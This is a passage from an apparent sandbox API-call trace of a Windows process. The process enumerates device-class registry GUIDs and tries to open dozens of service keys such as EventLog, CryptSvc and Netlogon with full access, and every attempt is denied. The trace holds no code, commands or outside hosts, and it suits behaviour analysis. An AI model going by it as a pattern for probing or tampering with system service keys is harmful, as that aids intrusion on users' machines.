(HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b73d0 [0175.716] GetProcessHeap () returned 0x4a0000 [0175.716] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6e08 [0175.716] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x60, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E975-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.717] lstrlenW (lpString="{4D36E975-E325-11CE-BFC1-08002BE10318}") returned 38 [0175.717] GetProcessHeap () returned 0x4a0000 [0175.717] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b7428 [0175.717] GetProcessHeap () returned 0x4a0000 [0175.717] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6e28 [0175.717] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x61, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E977-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.717] lstrlenW (lpString="{4D36E977-E325-11CE-BFC1-08002BE10318}") returned 38 [0175.717] GetProcessHeap () returned 0x4a0000 [0175.717] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b7480 [0175.717] GetProcessHeap () returned 0x4a0000 [0175.717] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6e48 [0175.717] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x62, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E97B-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.718] lstrlenW (lpString="{4D36E97B-E325-11CE-BFC1-08002BE10318}") returned 38 [0175.718] GetProcessHeap () returned 0x4a0000 [0175.718] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b74d8 [0175.718] GetProcessHeap () returned 0x4a0000 [0175.718] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6e68 [0175.718] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x63, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E97D-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.718] lstrlenW (lpString="{4D36E97D-E325-11CE-BFC1-08002BE10318}") returned 38 [0175.718] GetProcessHeap () returned 0x4a0000 [0175.718] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b7530 [0175.723] GetProcessHeap () returned 0x4a0000 [0175.723] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b80b8 [0175.723] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x64, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E980-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.723] lstrlenW (lpString="{4D36E980-E325-11CE-BFC1-08002BE10318}") returned 38 [0175.723] GetProcessHeap () returned 0x4a0000 [0175.723] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b7588 [0175.724] GetProcessHeap () returned 0x4a0000 [0175.724] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b80d8 [0175.724] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x65, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{50DD5230-BA8A-11D1-BF5D-0000F805F530}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.724] lstrlenW (lpString="{50DD5230-BA8A-11D1-BF5D-0000F805F530}") returned 38 [0175.724] GetProcessHeap () returned 0x4a0000 [0175.724] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b75e0 [0175.724] GetProcessHeap () returned 0x4a0000 [0175.724] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b80f8 [0175.724] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x66, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{533C5B84-EC70-11D2-9505-00C04F79DEAF}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.724] lstrlenW (lpString="{533C5B84-EC70-11D2-9505-00C04F79DEAF}") returned 38 [0175.724] GetProcessHeap () returned 0x4a0000 [0175.724] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b7638 [0175.724] GetProcessHeap () returned 0x4a0000 [0175.725] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b8118 [0175.725] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x67, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{6BDD1FC1-810F-11D0-BEC7-08002BE2092F}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.725] lstrlenW (lpString="{6BDD1FC1-810F-11D0-BEC7-08002BE2092F}") returned 38 [0175.725] GetProcessHeap () returned 0x4a0000 [0175.725] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b7690 [0175.725] GetProcessHeap () returned 0x4a0000 [0175.725] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b8138 [0175.725] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x68, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{71A27CDD-812A-11D0-BEC7-08002BE2092F}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.725] lstrlenW (lpString="{71A27CDD-812A-11D0-BEC7-08002BE2092F}") returned 38 [0175.725] GetProcessHeap () returned 0x4a0000 [0175.725] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b76e8 [0175.725] GetProcessHeap () returned 0x4a0000 [0175.726] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b8158 [0175.726] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x69, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.726] lstrlenW (lpString="{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}") returned 38 [0175.726] GetProcessHeap () returned 0x4a0000 [0175.726] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b7740 [0175.726] GetProcessHeap () returned 0x4a0000 [0175.726] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b8178 [0175.726] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x6a, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{D48179BE-EC20-11D1-B6B8-00C04FA372A7}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.726] lstrlenW (lpString="{D48179BE-EC20-11D1-B6B8-00C04FA372A7}") returned 38 [0175.726] GetProcessHeap () returned 0x4a0000 [0175.726] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b7798 [0175.726] GetProcessHeap () returned 0x4a0000 [0175.727] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b8198 [0175.727] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x6b, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{D94EE5D8-D189-4994-83D2-F68D7D41B0E6}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.727] lstrlenW (lpString="{D94EE5D8-D189-4994-83D2-F68D7D41B0E6}") returned 38 [0175.727] GetProcessHeap () returned 0x4a0000 [0175.727] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b77f0 [0175.727] GetProcessHeap () returned 0x4a0000 [0175.727] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b81b8 [0175.727] GetProcessHeap () returned 0x4a0000 [0175.727] GetProcessHeap () returned 0x4a0000 [0175.727] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6e90) returned 1 [0175.727] GetProcessHeap () returned 0x4a0000 [0175.727] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6e90) returned 0x9e [0175.728] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6e90 | out: hHeap=0x4a0000) returned 1 [0175.728] RegOpenKeyExW (in: hKey=0x78, lpSubKey="AFD", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.728] RegOpenKeyExW (in: hKey=0x78, lpSubKey="AppInfo", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.729] RegOpenKeyExW (in: hKey=0x78, lpSubKey="AppMgmt", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.729] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Base", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.730] RegOpenKeyExW (in: hKey=0x78, lpSubKey="BFE", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.730] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Boot Bus Extender", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.731] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Boot file system", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.731] RegOpenKeyExW (in: hKey=0x78, lpSubKey="bowser", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.732] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Browser", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.732] RegOpenKeyExW (in: hKey=0x78, lpSubKey="CryptSvc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.733] RegOpenKeyExW (in: hKey=0x78, lpSubKey="DcomLaunch", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.733] RegOpenKeyExW (in: hKey=0x78, lpSubKey="dfsc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.734] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Dhcp", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.739] RegOpenKeyExW (in: hKey=0x78, lpSubKey="DnsCache", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.739] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Dot3Svc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.740] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Eaphost", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.740] RegOpenKeyExW (in: hKey=0x78, lpSubKey="EFS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.741] RegOpenKeyExW (in: hKey=0x78, lpSubKey="EventLog", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.741] RegOpenKeyExW (in: hKey=0x78, lpSubKey="File system", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.742] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Filter", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.742] RegOpenKeyExW (in: hKey=0x78, lpSubKey="HelpSvc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.743] RegOpenKeyExW (in: hKey=0x78, lpSubKey="IKEEXT", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.743] RegOpenKeyExW (in: hKey=0x78, lpSubKey="ipnat.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.744] RegOpenKeyExW (in: hKey=0x78, lpSubKey="KeyIso", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.744] RegOpenKeyExW (in: hKey=0x78, lpSubKey="LanmanServer", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.745] RegOpenKeyExW (in: hKey=0x78, lpSubKey="LanmanWorkstation", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.745] RegOpenKeyExW (in: hKey=0x78, lpSubKey="LmHosts", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.745] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Messenger", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.746] RegOpenKeyExW (in: hKey=0x78, lpSubKey="mrxsmb", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.746] RegOpenKeyExW (in: hKey=0x78, lpSubKey="mrxsmb10", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.747] RegOpenKeyExW (in: hKey=0x78, lpSubKey="mrxsmb20", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.747] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NativeWifiP", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.748] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NDIS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.749] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NDIS Wrapper", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.749] RegOpenKeyExW (in: hKey=0x78, lpSubKey="ndiscap", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.754] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Ndisuio", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.755] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NetBIOS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.755] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NetBIOSGroup", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.756] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NetBT", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.756] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NetDDEGroup", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.757] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Netlogon", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.020] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NetMan", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.021] RegOpenKeyExW (in: hKey=0x78, lpSubKey="netprofm", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.021] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Network", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.022] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NetworkProvider", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.022] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NlaSvc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.023] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Nsi", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.023] RegOpenKeyExW (in: hKey=0x78, lpSubKey="nsiproxy.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.024] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NTDS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.024] RegOpenKeyExW (in: hKey=0x78, lpSubKey="PCI Configuration", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.024] RegOpenKeyExW (in: hKey=0x78, lpSubKey="PlugPlay", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.025] RegOpenKeyExW (in: hKey=0x78, lpSubKey="PNP Filter", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.025] RegOpenKeyExW (in: hKey=0x78, lpSubKey="PNP_TDI", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.026] RegOpenKeyExW (in: hKey=0x78, lpSubKey="PolicyAgent", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.026] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Primary disk", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.027] RegOpenKeyExW (in: hKey=0x78, lpSubKey="rdbss", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.027] RegOpenKeyExW (in: hKey=0x78, lpSubKey="rdpencdd.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.028] RegOpenKeyExW (in: hKey=0x78, lpSubKey="rdsessmgr", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.028] RegOpenKeyExW (in: hKey=0x78, lpSubKey="RpcEptMapper", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.029] RegOpenKeyExW (in: hKey=0x78, lpSubKey="RpcSs", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.029] RegOpenKeyExW (in: hKey=0x78, lpSubKey="sacsvr", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.030] RegOpenKeyExW (in: hKey=0x78, lpSubKey="SCardSvr", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.035] RegOpenKeyExW (in: hKey=0x78, lpSubKey="SCSI Class", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.035] RegOpenKeyExW (in: hKey=0x78, lpSubKey="sermouse.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.036] RegOpenKeyExW (in: hKey=0x78, lpSubKey="SharedAccess", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.036] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Streams Drivers", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.037] RegOpenKeyExW (in: hKey=0x78, lpSubKey="SWPRV", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.037] RegOpenKeyExW (in: hKey=0x78, lpSubKey="System Bus Extender", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.038] RegOpenKeyExW (in: hKey=0x78, lpSubKey="TabletInputService", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.038] RegOpenKeyExW (in: hKey=0x78, lpSubKey="TBS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.039] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Tcpip", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.039] RegOpenKeyExW (in: hKey=0x78, lpSubKey="TDI", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.040] RegOpenKeyExW (in: hKey=0x78, lpSubKey="TrustedInstaller", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.040] RegOpenKeyExW (in: hKey=0x78, lpSubKey="VaultSvc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.041] RegOpenKeyExW (in: hKey=0x78, lpSubKey="VDS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.041] RegOpenKeyExW (in: hKey=0x78, lpSubKey="vga.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.042] RegOpenKeyExW (in: hKey=0x78, lpSubKey="vgasave.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.042] RegOpenKeyExW (in: hKey=0x78, lpSubKey="vmms", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.043] RegOpenKeyExW (in: hKey=0x78, lpSubKey="volmgr.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.043] RegOpenKeyExW (in: hKey=0x78, lpSubKey="volmgrx.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.044] RegOpenKeyExW (in: hKey=0x78, lpSubKey="WinMgmt", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.044] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Wlansvc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.045] RegOpenKeyExW (in: hKey=0x78, lpSubKey="WudfPf", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.045] RegOpenKeyExW (in: hKey=0x78, lpSubKey="WudfRd", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.045] RegOpenKeyExW (in: hKey=0x78, lpSubKey="WudfSvc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.050] RegOpenKeyExW (in: hKey=0x78, lpSubKey="WudfUsbccidDriver", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.051] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{36FC9E60-C465-11CF-8056-444553540000}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.051] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E965-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.052] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E967-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.052] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E969-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.053] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E96A-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.053] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E96B-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.054] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E96F-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, 